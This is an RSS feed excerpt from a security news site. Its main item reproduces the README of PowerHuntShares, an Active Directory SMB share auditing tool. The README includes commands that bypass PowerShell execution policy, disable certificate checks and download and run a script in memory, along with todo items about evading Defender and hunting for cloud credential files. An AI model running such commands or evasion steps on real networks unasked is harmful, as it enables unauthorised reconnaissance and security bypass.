performance when multithreaded. Everything we do, from data collection, to health, streaming, replication, etc., is actually business logic on top of these elements.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Chris-1235"> /u/Chris-1235 </a> <br><span><a href="https://www.reddit.com/r/linux/comments/10vf42u/netdata_release_1380/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/10vf42u/netdata_release_1380/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[PowerHuntShares - Audit Script Designed In Inventory, Analyze, And Report Excessive Privileges Configured On Active Directory Domains]]></title>
<description><![CDATA[PowerHuntShares is design to automatically inventory, analyze, and report excessive privilege assigned to SMB shares on Active Directory domain joined computers.  It is intented to help IAM and other blue teams gain a better understand of their SMB Share attack surface and provides data insights ...]]></description>
<link>https://tsecurity.de/de/1764910/it-security-nachrichten/powerhuntshares-audit-script-designed-in-inventory-analyze-and-report-excessive-privileges-configured-on-active-directory-domains/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1764910/it-security-nachrichten/powerhuntshares-audit-script-designed-in-inventory-analyze-and-report-excessive-privileges-configured-on-active-directory-domains/</guid>
<pubDate>Wed, 11 Jan 2023 14:00:51 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjNfJYPDUkGgKdCgJqsu3vnBOgcGihCnXt-WB4_T_Hwkq2ErorINSFiRY5-HguP7ZWB00gfpOC2FZqyiR0_HT8Tm437nczRMLx2zAWeAUmpi1MJUgQpS9tn0SpqqAj0LB6h1BgGQBI_mBQmwd0vqT_1iqGLoB_Z0iH66yCz1Ulk5fjwZrKrzA1U7_Rlvg"><img alt="" border="0" height="484" src="https://blogger.googleusercontent.com/img/a/AVvXsEjNfJYPDUkGgKdCgJqsu3vnBOgcGihCnXt-WB4_T_Hwkq2ErorINSFiRY5-HguP7ZWB00gfpOC2FZqyiR0_HT8Tm437nczRMLx2zAWeAUmpi1MJUgQpS9tn0SpqqAj0LB6h1BgGQBI_mBQmwd0vqT_1iqGLoB_Z0iH66yCz1Ulk5fjwZrKrzA1U7_Rlvg=w640-h484" width="640"></a></p><br><p dir="auto">PowerHuntShares is design to automatically inventory, analyze, and report excessive privilege assigned to SMB shares on <a href="https://www.kitploit.com/search/label/Active%20Directory" target="_blank" title="Active Directory">Active Directory</a> domain joined computers.<br>  It is intented to help IAM and other blue teams gain a better understand of their SMB Share attack surface and provides data insights to help naturally group related share to help stream line remediation efforts at scale.</p><span><a name="more"></a></span><p dir="auto"><br></p>  <p dir="auto">It supports functionality to:</p>  <ul dir="auto"><li><strong>Authenticate</strong> using the current user context, a credential, or clear text user/password.</li>  <li><strong>Discover</strong> accessible systems associated with an Active Directory domain automatically. It will also filter Active Directory computers based on available open ports.</li>  <li><strong>Target</strong> a single computer, list of computers, or discovered Active Directory computers (default).</li>  <li><strong>Collect</strong> SMB share ACL information from target computers using PowerShell.</li>  <li><strong>Analyze</strong> collected Share ACL data.</li>  <li><strong>Report</strong> summary reports and excessive privilege details in HTML and CSV file formats.</li>  </ul><p dir="auto">Excessive SMB share ACLs are a systemic problem and an attack surface that all organizations struggle with.  The goal of this project is to provide a proof concept that will work towards building a better share collection and data insight engine that can help inform and priorititize remediation efforts.  <br><br>  Bonus Features:  <br></p>  <ul dir="auto"><li>Generate directory listing dump for configurable depth</li>  <li>Search for file types across discovered shares</li>  </ul><p dir="auto">I've also put together a short presentation outlining some of the common <a href="https://www.kitploit.com/search/label/Misconfigurations" target="_blank" title="misconfigurations">misconfigurations</a> and strategies for prioritizing remediation here:  <a href="https://www.slideshare.net/nullbind/into-the-abyss-evaluating-active-directory-smb-shares-on-scale-secure360-251762721" rel="nofollow" target="_blank" title="https://www.slideshare.net/nullbind/into-the-abyss-evaluating-active-directory-smb-shares-on-scale-secure360-251762721">https://www.slideshare.net/nullbind/into-the-abyss-evaluating-active-directory-smb-shares-on-scale-secure360-251762721</a></p>  <h1 dir="auto">Vocabulary</h1>  <p dir="auto">PowerHuntShares will inventory SMB share ACLs configured with "excessive privileges" and highlight "high risk" ACLs.  Below is how those are defined in this context.</p>  <p dir="auto"><strong>Excessive Privileges</strong><br>  Excessive read and write share permissions have been defined as any network share ACL containing an explicit ACE (Access Control Entry) for the "Everyone", "Authenticated Users", "BUILTIN\Users", "Domain Users", or "Domain Computers" groups. All provide domain users access to the affected shares due to privilege inheritance issues.  Note there is a parameter that allow operators to add their own target groups.<br>  Below is some additional background:<br></p>  <ul dir="auto"><li>Everyone is a direct reference that applies to both unauthenticated and authenticated users.  Typically only a null session is required to access those resources.</li>  <li>BUILTIN\Users contains Authenticated Users</li>  <li>Authenticated Users contains Domain Users on domain joined systems. That's why Domain Users can access a share when the share permissions have been assigned to "BUILTIN\Users".</li>  <li>Domain Users is a direct reference</li>  <li>Domain Users can also create up to 10 computer accounts by default that get placed in the Domain Computers group</li>  <li>Domain Users that have local administrative access to a domain joined computer can also impersonate the computer account.</li>  </ul><p dir="auto">Please Note: Share permissions can be overruled by NTFS permissions. Also, be aware that testing excluded share names containing the following keywords: </p><pre><code>print$, prnproc$, printer, netlogon,and sysvol</code></pre><p dir="auto"></p>  <p dir="auto"><strong>High Risk Shares</strong><br>  In the context of this report, high risk shares have been defined as shares that provide unauthorized <a href="https://www.kitploit.com/search/label/Remote%20Access" target="_blank" title="remote access">remote access</a> to a system or application.  By default, that includes the shares </p><pre><code> wwwroot, inetpub, c$, and admin$   </code></pre>  However, additional exposures may exist that are not called out beyond that.<p dir="auto"></p>  <h1 dir="auto">Setup Commands</h1>  <p dir="auto">Below is a list of commands that can be used to load PowerHuntShares into your current PowerShell session. Please note that one of these will have to be run each time you run PowerShell is run.  It is not persistent.</p>  <pre><code># Bypass execution policy restrictions<br>Set-ExecutionPolicy -Scope Process Bypass<br><br># Import module that exists in the current directory<br>Import-Module .\PowerHuntShares.psm1<br><br>or<br><br># Reduce SSL operating level to support connection to github<br>[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}<br>[Net.ServicePointManager]::SecurityProtocol =[Net.SecurityProtocolType]::Tls12<br><br># Download and load PowerHuntShares.psm1 into memory<br>IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerHuntShares/main/PowerHuntShares.psm1")<br></code></pre>  <h1 dir="auto">Example Commands</h1>  <p dir="auto">Important Note: All commands should be run as an unprivileged domain user.</p>  <pre><code>.EXAMPLE 1: Run from a domain computer. Performs Active Directory computer discovery by default.<br>PS C:\temp\test&gt; Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test <br><br>.EXAMPLE 2: Run from a domain computer with alternative domain credentials. Performs Active Directory computer discovery by default.<br>PS C:\temp\test&gt; Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test -Credentials domain\user<br><br>.EXAMPLE 3: Run from a domain computer as current user. Target hosts in a file. One per line.<br>PS C:\temp\test&gt; Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test  -HostList c:\temp\hosts.txt      <br><br>.EXAMPLE 4: Run from a non-domain computer with credential. Performs Active Directory computer discovery by default.<br>C:\temp\test&gt; runas /netonly /user:domain\user PowerShell.exe<br>PS C:\temp\test&gt; Import-Module Invoke-HuntSMBShares.ps1<br>PS C:\temp\test&gt; Invoke-HuntSMBShares -Threads 100 -Run   SpaceTimeOut 10 -OutputDirectory c:\folder\ -DomainController 10.1.1.1 -Credential domain\user <br><br>===============================================================<br>PowerHuntShares<br>===============================================================<br> This function automates the following tasks:     <br><br> o Determine current computer's domain<br> o Enumerate domain computers        <br> o Filter for computers that respond to ping reqeusts          <br> o Filter for computers that have TCP 445 open and accessible  <br> o Enumerate SMB shares <br> o Enumerate SMB share permissions   <br> o Identify shares with potentially excessive privielges       <br> o Identify shares that provide reads &amp; write access           <br> o Identify shares thare are high risk<br> o Identify common share owners, names, &amp; directory listings   <br> o Generate creation, last written, &amp; last accessed timelines<br> o Generate html summary report and detailed csv files            <br><br> Note: This can take hours to run in large environments.       <br>---------------------------------------------------------------<br>|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||<br>---------------------------------------------------------------<br>SHARE DISCOVERY      <br>---------------------------------------------------------------<br>[*][03/01/2021 09:35] Scan Start<br>[*][03/01/2021 09:35] Output Directory: c:\temp\smbshares\SmbShareHunt-03012021093504<br>[*][03/01/2021 09:35] Successful connection to domain controller: dc1.demo.local<br>[*][03/01/2021 09:35] Performing LDAP query for computers associated with the demo.local domain<br>[*][03/01/2021 09:35] - 245 computers found<br>[*][03/01/2021 09:35] Pinging 245 computers<br>[*][03/01/2021 09:35] - 55 computers responded to ping requests.<br>[*][03/01/2021 09:35] Checking if TCP Port 445 is open on 55 computers<br>[*][03/01/2021 09:36] - 49 computers have TCP port 445 open.<br>   [*][03/01/2021 09:36] Getting a list of SMB shares from 49 computers<br>[*][03/01/2021 09:36] - 217 SMB shares were found.<br>[*][03/01/2021 09:36] Getting share permissions from 217 SMB shares<br>[*][03/01/2021 09:37] - 374 share permissions were enumerated.<br>[*][03/01/2021 09:37] Getting directory listings from 33 SMB shares<br>[*][03/01/2021 09:37] - Targeting up to 3 nested directory levels<br>[*][03/01/2021 09:37] - 563 files and folders were enumerated.<br>[*][03/01/2021 09:37] Identifying potentially excessive share permissions<br>[*][03/01/2021 09:37] - 33 potentially excessive privileges were found across 12 systems..<br>[*][03/01/2021 09:37] Scan Complete<br>---------------------------------------------------------------<br>SHARE ANALYSIS      <br>---------------------------------------------------------------<br>[*][03/01/2021 09:37] Analysis Start<br>[*][03/01/2021 09:37] - 14 shares can be read across 12 systems.<br>[*][03/01/2021 09:37] - 1 shares can    be written to across 1 systems.<br>[*][03/01/2021 09:37] - 46 shares are considered non-default across 32 systems.<br>[*][03/01/2021 09:37] - 0 shares are considered high risk across 0 systems<br>[*][03/01/2021 09:37] - Identified top 5 owners of excessive shares.<br>[*][03/01/2021 09:37] - Identified top 5 share groups.<br>[*][03/01/2021 09:37] - Identified top 5 share names.<br>[*][03/01/2021 09:37] - Identified shares created in last 90 days.<br>[*][03/01/2021 09:37] - Identified shares accessed in last 90 days.<br>[*][03/01/2021 09:37] - Identified shares modified in last 90 days.<br>[*][03/01/2021 09:37] Analysis Complete<br>---------------------------------------------------------------<br>SHARE REPORT SUMMARY      <br>---------------------------------------------------------------<br>[*][03/01/2021 09:37] Domain: demo.local<br>[*][03/01/2021 09:37] Start time: 03/01/2021 09:35:04<br>[*][03/01/2021 09:37] End time: 03/01/2021 09:37:27<br>[*][03/01/2021 09:37] R   un time: 00:02:23.2759086<br>[*][03/01/2021 09:37] <br>[*][03/01/2021 09:37] COMPUTER SUMMARY<br>[*][03/01/2021 09:37] - 245 domain computers found.<br>[*][03/01/2021 09:37] - 55 (22.45%) domain computers responded to ping.<br>[*][03/01/2021 09:37] - 49 (20.00%) domain computers had TCP port 445 accessible.<br>[*][03/01/2021 09:37] - 32 (13.06%) domain computers had shares that were non-default.<br>[*][03/01/2021 09:37] - 12 (4.90%) domain computers had shares with potentially excessive privileges.<br>[*][03/01/2021 09:37] - 12 (4.90%) domain computers had shares that allowed READ access.<br>[*][03/01/2021 09:37] - 1 (0.41%) domain computers had shares that allowed WRITE access.<br>[*][03/01/2021 09:37] - 0 (0.00%) domain computers had shares that are HIGH RISK.<br>[*][03/01/2021 09:37] <br>[*][03/01/2021 09:37] SHARE SUMMARY<br>[*][03/01/2021 09:37] - 217 shares were found. We expect a minimum of 98 shares<br>[*][03/01/2021 09:37]   because 49 systems had open ports a   nd there are typically two default shares.<br>[*][03/01/2021 09:37] - 46 (21.20%) shares across 32 systems were non-default.<br>[*][03/01/2021 09:37] - 14 (6.45%) shares across 12 systems are configured with 33 potentially excessive ACLs.<br>[*][03/01/2021 09:37] - 14 (6.45%) shares across 12 systems allowed READ access.<br>[*][03/01/2021 09:37] - 1 (0.46%) shares across 1 systems allowed WRITE access.<br>[*][03/01/2021 09:37] - 0 (0.00%) shares across 0 systems are considered HIGH RISK.<br>[*][03/01/2021 09:37] <br>[*][03/01/2021 09:37] SHARE ACL SUMMARY<br>[*][03/01/2021 09:37] - 374 ACLs were found.<br>[*][03/01/2021 09:37] - 374 (100.00%) ACLs were associated with non-default shares.<br>[*][03/01/2021 09:37] - 33 (8.82%) ACLs were found to be potentially excessive.<br>[*][03/01/2021 09:37] - 32 (8.56%) ACLs were found that allowed READ access.<br>[*][03/01/2021 09:37] - 1 (0.27%) ACLs were found that allowed WRITE access.<br>[*][03/01/2021 09:37] - 0 (0.00%) ACLs we   re found that are associated with HIGH RISK share names.<br>[*][03/01/2021 09:37] <br>[*][03/01/2021 09:37] - The 5 most common share names are:<br>[*][03/01/2021 09:37] - 9 of 14 (64.29%) discovered shares are associated with the top 5 share names.<br>[*][03/01/2021 09:37]   - 4 backup<br>[*][03/01/2021 09:37]   - 2 ssms<br>[*][03/01/2021 09:37]   - 1 test2<br>[*][03/01/2021 09:37]   - 1 test1<br>[*][03/01/2021 09:37]   - 1 users<br>[*] -----------------------------------------------<br></code></pre>  <h1 dir="auto">HTML Report Examples</h1>  <p dir="auto"><a href="https://raw.githubusercontent.com/NetSPI/PowerHuntShares/main/summary-report.png" rel="nofollow" target="_blank" title="PowerHuntShares is an audit script designed in inventory, analyze, and report excessive privileges configured on Active Directory domains. (5)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjNfJYPDUkGgKdCgJqsu3vnBOgcGihCnXt-WB4_T_Hwkq2ErorINSFiRY5-HguP7ZWB00gfpOC2FZqyiR0_HT8Tm437nczRMLx2zAWeAUmpi1MJUgQpS9tn0SpqqAj0LB6h1BgGQBI_mBQmwd0vqT_1iqGLoB_Z0iH66yCz1Ulk5fjwZrKrzA1U7_Rlvg"><img alt="" border="0" height="484" src="https://blogger.googleusercontent.com/img/a/AVvXsEjNfJYPDUkGgKdCgJqsu3vnBOgcGihCnXt-WB4_T_Hwkq2ErorINSFiRY5-HguP7ZWB00gfpOC2FZqyiR0_HT8Tm437nczRMLx2zAWeAUmpi1MJUgQpS9tn0SpqqAj0LB6h1BgGQBI_mBQmwd0vqT_1iqGLoB_Z0iH66yCz1Ulk5fjwZrKrzA1U7_Rlvg=w640-h484" width="640"></a></p>  <h1 dir="auto">Credits</h1>  <p dir="auto"><strong>Author</strong><br>  Scott Sutherland (@_nullbind)<br></p>  <p dir="auto"><strong>Open-Source Code Used</strong> <br>  These individuals wrote open source code that was used as part of this project. A big thank you goes out them and their work!<br></p>  <table><tbody><tr><th align="left">Name</th>  <th align="left">Site</th>  </tr><tr><td align="left">Will Schroeder (@harmj0y)</td>  <td align="left"><a href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1" rel="nofollow" target="_blank" title="https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1">https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1</a></td>  </tr><tr><td align="left">Warren F (@pscookiemonster)</td>  <td align="left"><a href="https://github.com/RamblingCookieMonster/Invoke-Parallel" rel="nofollow" target="_blank" title="https://github.com/RamblingCookieMonster/Invoke-Parallel">https://github.com/RamblingCookieMonster/Invoke-Parallel</a></td>  </tr><tr><td align="left">Luben Kirov</td>  <td align="left"><a href="http://www.gi-architects.co.uk/2016/02/powershell-check-if-ip-or-subnet-matchesfits/" rel="nofollow" target="_blank" title="http://www.gi-architects.co.uk/2016/02/powershell-check-if-ip-or-subnet-matchesfits/">http://www.gi-architects.co.uk/2016/02/powershell-check-if-ip-or-subnet-matchesfits/</a></td>  </tr></tbody></table><p dir="auto"><strong>License</strong><br>  BSD 3-Clause</p>  <h2 dir="auto">Todos</h2>  <p dir="auto"><strong>Pending Fixes/Bugs</strong></p>  <ul dir="auto"><li>Update code to avoid defender</li>  <li>Fix file listing formating on data insight pages</li>  <li>IPv6 addresses dont show up in subnets summary</li>  <li>ACLs associated with Builtin\Users sometimes shows up as LocalSystem under undefined conditions, and as a result, doesnt show up in the Excessive Privileges export. - Thanks Sam!</li>  </ul><p dir="auto"><strong>Pending Features</strong></p>  <ul dir="auto"><li>Add ability to specify additional groups to target</li>  <li>Add directory listing to insights page.</li>  <li>Add ability to grab system OS information for data insights.</li>  <li>Add visualization: Visual squares with coloring mapped to share volume density by subnet or ip?.</li>  <li>Add file type search. (half coded) + add to data insights. Don't forget things like *.aws, *.azure *.gcp directories that store cloud credentials.</li>  <li>Add file content search.</li>  <li>Add DontExcludePrintShares option</li>  <li>Add auto targeting of groups that contain a large % of the user population; over 70% (make configurable). Add as option.</li>  <li>Add configuration fid:  netlogon and sysvol you may get access denied when using windows 10 unless the setting below is configured. Automat a check for this, and attempt to modify if privs are at correct level. gpedit.msc, go to Computer -&gt; Administrative Templates -&gt; Network -&gt; Network Provider -&gt; Hardened UNC Paths, enable the policy and click "Show" button. Enter your server name (* for all servers) into "Value name" and enter the folowing text "RequireMutualAuthentication=0,RequireIntegrity=0,RequirePrivacy=0" wihtout quotes into the "Value" field.</li>  <li>Add an interesting shares based on names to data insights. example: sql, backup, password, etc.</li>  <li>Add active sessions data to help identify potential owners/users of share.</li>  <li>Pull spns and computer description/spn account descriptions to help identify owner/business unit.</li>  <li>Create <a href="https://www.kitploit.com/search/label/BloodHound" target="_blank" title="bloodhound">bloodhound</a> import file / edge (highrisk share)</li>  <li>Research to identify additional high risk share names based on common technology</li>  <li>Add better support for IPv6</li>  <li>Dynamic identification of spikes in high risk share creation/common groupings, need to better summarize supporting detail beyond just the timeline. For each of the data insights, add average number of shares created for insight grouping by year/month (for folder hash / name etc), and the increase the month/year it spikes. (attempt to provide some historical context); maybe even list the most common non default directories being used by each of those. Potentially adding "first seen date" as well.</li>  <li>add showing share permissions (along with the already displayed NTFS permissions) and resultant access (most restrictive wins)</li>  </ul><br><br><div><b><span><a class="kiploit-download" href="https://github.com/NetSPI/PowerHuntShares" rel="nofollow" target="_blank" title="Download PowerHuntShares">Download PowerHuntShares</a></span></b></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Connect FreeBSD to FreeIPA/Red Hat Identity Management]]></title>
<description><![CDATA[submitted by    /u/vermaden  [link]   [comments]]]></description>
<link>https://tsecurity.de/de/1697835/linux-tipps/connect-freebsd-to-freeipared-hat-identity-management/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1697835/linux-tipps/connect-freebsd-to-freeipared-hat-identity-management/</guid>
<pubDate>Thu, 17 Nov 2022 08:15:10 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/vermaden"> /u/vermaden </a> <br><span><a href="https://vermaden.wordpress.com/2022/11/17/connect-freebsd-freeipa-idm/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/yxjcu4/connect_freebsd_to_freeipared_hat_identity/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Online-Intensivseminar "Exchange Hybrid"]]></title>
<description><![CDATA[Immer mehr Unternehmen weiten ihre lokale Exchange-Struktur in die Cloud aus oder denken darüber nach. Deshalb bringt unser neues Intensivseminar Ihnen den Umgang mit Microsofts Groupware-Umgebung im hybriden Betrieb näher. Dazu stellt das Onlinetraining Mitte Februar lokale und cloudbasierte Fea...]]></description>
<link>https://tsecurity.de/de/1693958/server/online-intensivseminar-exchange-hybrid/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1693958/server/online-intensivseminar-exchange-hybrid/</guid>
<pubDate>Mon, 14 Nov 2022 00:04:38 +0100</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Immer mehr Unternehmen weiten ihre lokale Exchange-Struktur in die Cloud aus oder denken darüber nach. Deshalb bringt unser neues Intensivseminar Ihnen den Umgang mit Microsofts Groupware-Umgebung im hybriden Betrieb näher. Dazu stellt das Onlinetraining Mitte Februar lokale und cloudbasierte Features der Serversoftware vor, klärt die Voraussetzungen für eine Exchange-Hybrid-Umgebung und lässt eine solche schließlich exemplarisch entstehen. Die Teilnehmerzahl ist begrenzt, sichern Sie sich also Ihren Platz. Abonnenten nehmen wie immer zum Vorzugspreis teil.]]></content:encoded>
</item>
<item>
<title><![CDATA[Zwei Probleme in freeipa (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/1632863/it-security-nachrichten/zwei-probleme-in-freeipa-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1632863/it-security-nachrichten/zwei-probleme-in-freeipa-fedora/</guid>
<pubDate>Fri, 16 Sep 2022 07:33:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[CVE-2016-5404 | FreeIPA cert_revoke access control (FEDORA-2016-7898627d08 / Nessus ID 93205)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in  FreeIPA. This affects an unknown part of the component cert_revoke. The manipulation leads to improper access controls.

This vulnerability is uniquely identified as CVE-2016-5404. It is possible to initiate the attack remotely. The...]]></description>
<link>https://tsecurity.de/de/1631754/sicherheitsluecken/cve-2016-5404-freeipa-certrevoke-access-control-fedora-2016-7898627d08-nessus-id-93205/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1631754/sicherheitsluecken/cve-2016-5404-freeipa-certrevoke-access-control-fedora-2016-7898627d08-nessus-id-93205/</guid>
<pubDate>Thu, 15 Sep 2022 10:15:21 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as critical, was found in  FreeIPA. This affects an unknown part of the component <em>cert_revoke</em>. The manipulation leads to improper access controls.

This vulnerability is uniquely identified as <a href="https://vuldb.com/?source_cve.91353">CVE-2016-5404</a>. It is possible to initiate the attack remotely. There is no exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Vulnerability In FreeIPA System Could Expose User Credentials]]></title>
<description><![CDATA[A severe security vulnerability existed in the identity management system FreeIPA that would expose user…
Vulnerability In FreeIPA System Could Expose User Credentials on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.]]></description>
<link>https://tsecurity.de/de/1608513/it-security-nachrichten/vulnerability-in-freeipa-system-could-expose-user-credentials/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1608513/it-security-nachrichten/vulnerability-in-freeipa-system-could-expose-user-credentials/</guid>
<pubDate>Mon, 22 Aug 2022 22:33:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A severe security vulnerability existed in the identity management system FreeIPA that would expose user…</p>
<p><a rel="nofollow" href="https://latesthackingnews.com/2022/08/22/vulnerability-in-freeipa-system-could-expose-user-credentials/">Vulnerability In FreeIPA System Could Expose User Credentials</a> on <a rel="nofollow" href="https://latesthackingnews.com/">Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Online-Training "Domaincontroller für Linux-Umgebungen mit FreeIPA"]]></title>
<description><![CDATA[Unser Training "Domaincontroller für Linux-Umgebungen mit FreeIPA"
demonstriert praxisnah, wie sich Linux-Clients via Domaincontroller
ähnlich komfortabel und unter ähnlich hohen Sicherheitsstandards
verwalten lassen wie etwa das Active Directory.  Dabei erhalten Sie
zunächst eine Einführung in L...]]></description>
<link>https://tsecurity.de/de/1503483/server/online-training-domaincontroller-fuer-linux-umgebungen-mit-freeipa/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1503483/server/online-training-domaincontroller-fuer-linux-umgebungen-mit-freeipa/</guid>
<pubDate>Mon, 14 Jun 2021 01:47:15 +0200</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Unser Training "Domaincontroller für Linux-Umgebungen mit FreeIPA"
demonstriert praxisnah, wie sich Linux-Clients via Domaincontroller
ähnlich komfortabel und unter ähnlich hohen Sicherheitsstandards
verwalten lassen wie etwa das Active Directory.  Dabei erhalten Sie
zunächst eine Einführung in LDAP, Kerberos und X.509. Die
Veranstaltung findet am 29. Juli 2021 online statt. Buchen Sie schnell, um sich noch einen Platz zu sichern &amp;#8211; für Abonnenten
gilt wie immer ein Sondertarif.]]></content:encoded>
</item>
<item>
<title><![CDATA[Übernahme der Konteneinstellungen vom Domaincontroller möglich?]]></title>
<description><![CDATA[Über den Domaincontroller (Windows Server 2019) soll nur die Anmeldung kontrolliert werden, Dateien und Ordner, die sich auf den lokalen Rechnern ...]]></description>
<link>https://tsecurity.de/de/1497979/windows-server/uebernahme-der-konteneinstellungen-vom-domaincontroller-moeglich/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1497979/windows-server/uebernahme-der-konteneinstellungen-vom-domaincontroller-moeglich/</guid>
<pubDate>Tue, 08 Jun 2021 21:17:03 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Über den Domaincontroller (<b>Windows Server</b> 2019) soll nur die Anmeldung kontrolliert werden, Dateien und Ordner, die sich auf den lokalen Rechnern ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Online-Training "Domaincontroller für Linux-Umgebungen mit FreeIPA"]]></title>
<description><![CDATA[Unser Training "Domaincontroller für Linux-Umgebungen mit FreeIPA«
demonstriert praxisnah, wie sich Linux-Clients via Domaincontroller
ähnlich komfortabel und ähnlich hohen Sicherheitsstandards
verwalten lassen wie etwa das Active Directory.  Dabei erhalten Sie
zunächst Einführung in LDAP,Kerbero...]]></description>
<link>https://tsecurity.de/de/1473464/server/online-training-domaincontroller-fuer-linux-umgebungen-mit-freeipa/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1473464/server/online-training-domaincontroller-fuer-linux-umgebungen-mit-freeipa/</guid>
<pubDate>Mon, 17 May 2021 00:31:41 +0200</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Unser Training "Domaincontroller für Linux-Umgebungen mit FreeIPA«
demonstriert praxisnah, wie sich Linux-Clients via Domaincontroller
ähnlich komfortabel und ähnlich hohen Sicherheitsstandards
verwalten lassen wie etwa das Active Directory.  Dabei erhalten Sie
zunächst Einführung in LDAP,Kerberos und X.509. Die
Veranstaltung findet am 29. Juli 2021 online statt. Buchen Sie schnell, um sich noch einen Platz zu sichern &amp;#8211; für Abonnenten
gilt wie immer ein Sondertarif.]]></content:encoded>
</item>
<item>
<title><![CDATA[CentOS Blog: CentOS Community Newsletter, May 2021 (#2105)]]></title>
<description><![CDATA[Hello, friends,
It's been another busy month in the CentOS Project, so we'll get straight to the news:
CentOS Stream News
Last week, Brian Stinson announced some updates on the progress towards CentOS Stream 9 on the centos-devel mailing list.
This included the availability of Stream 9 packages o...]]></description>
<link>https://tsecurity.de/de/1460464/unix-server/centos-blog-centos-community-newsletter-may-2021-2105/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1460464/unix-server/centos-blog-centos-community-newsletter-may-2021-2105/</guid>
<pubDate>Tue, 04 May 2021 04:16:59 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello, friends,</p>
<p>It's been another busy month in the CentOS Project, so we'll get straight to the news:</p>
<h2>CentOS Stream News</h2>
<p>Last week, Brian Stinson <a href="https://lists.centos.org/pipermail/centos-devel/2021-April/076772.html">announced some updates</a> on the progress towards CentOS Stream 9 on the centos-devel mailing list.</p>
<p>This included the availability of <a href="https://gitlab.com/redhat/centos-stream/rpms">Stream 9 packages on Gitlab</a>, and a <a href="https://kojihub.stream.centos.org/">koji instance</a> where you can watch package build activity.</p>
<p>And on Thursday we <a href="https://lists.centos.org/pipermail/centos-devel/2021-April/076802.html">announced</a> that the CentOS Stream 9 compose infrastructure is available at <a href="https://composes.stream.centos.org/test">https://composes.stream.centos.org/</a> if you want to try out very early builds of CentOS Stream 9.</p>
<p>If you're interested in contributing to CentOS Stream, you should start by <a href="https://gitlab.com/users/sign_up">registering for a Gitlab account</a>.  We're in the process of updating the contributor guide, and that should be posted soon. Follow the centos-devel mailing list, and @CentOS on Twitter, to be the first to find out the next updates.</p>
<h2>CentOS Dojo, May 13-14</h2>
<p>The schedule for the upcoming CentOS Dojo is <a href="https://wiki.centos.org/Events/Dojo/May2021">now posted</a>. We'll be featuring two days of technical presentations around the CentOS project and community, including an "Ask me anything" session with the board of directors.</p>
<p>Other sessions include:</p>
<p><strong>Thursday, May 13</strong></p>
<ul><li>New authentication platform for CentOS and SIGs</li>
<li> What's new in FreeIPA 4.9</li>
<li> Contributing to the CentOS Stream Kernel</li>
<li> CentOS Stream on Desktop or: How I Learned to Stop Worrying and Love LTS</li>
<li>Hyperscale SIG update</li>
</ul><p><strong>Friday, May 14th</strong></p>
<ul><li>Board AMA</li>
<li>Keeping track of CentOS infrastructure deployments with Ansible and ARA</li>
<li>Thinking About Binary Compatibility and CentOS Stream</li>
<li>CentOS Stream CI: current state and future plans</li>
<li>Hands-on building an AMI pipeline using CentOS Stream 8 and cloud-init</li>
</ul><p>Complete schedule and abstracts are available on the <a href="https://wiki.centos.org/Events/Dojo/May2021">event site</a>. The event will be online, and you will need to register (Free!) on the event website to attend. See you there!</p>
<h2>@CentOSProject is now @CentOS</h2>
